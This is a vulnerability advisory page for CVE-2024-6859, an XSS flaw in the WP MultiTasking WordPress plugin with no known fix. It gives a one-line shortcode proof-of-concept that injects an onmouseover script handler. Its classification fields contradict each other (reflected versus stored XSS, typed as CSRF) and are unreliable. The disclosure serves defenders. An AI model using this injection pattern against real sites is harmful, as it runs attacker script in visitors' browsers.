WP MultiTasking <= 0.1.12 – Reflected XSS via Shortcode | CVE 2024-6859 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, add the following to a post or page:

`[markid id='2" style="background-color: red; width: 500px; height: 500px; content: linear-gradient(#e66465, #9198e5);" onmouseover="alert(1)"']2daddasdas[/markid]`

Move your mouse over the gradient and see the XSS

Affects Plugins

wp-multitasking

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Verified

Yes

WPVDB ID

34ae6121-304f-495b-bcc1-4fbd3d70a9fb

Timeline

Publicly Published

2024-08-17 (about 1 year ago)

Added

2024-08-10 (about 1 year ago)

Last Updated

2024-08-10 (about 1 year ago)

Other

Published

Title

Published

2024-10-21

Title

Custom Twitter Feeds (Tweets Widget) < 2.2.4 - Cross-Site Request Forgery

Published

2023-10-03

Title

WP Pipes < 1.4.1 - CSRF

Published

2025-01-08

Title

Wordpress Header Builder Plugin < 1.3.9 - Cross-Site Request Forgery to Header Deletion

Published

2025-07-16

Title

WooCommerce Google Sheet Connector < 1.4.0 - Cross-Site Request Forgery

Published

2022-05-30

Title

CaPa Protect <= 0.5.8.2 - Arbitrary Settings Update via CSRF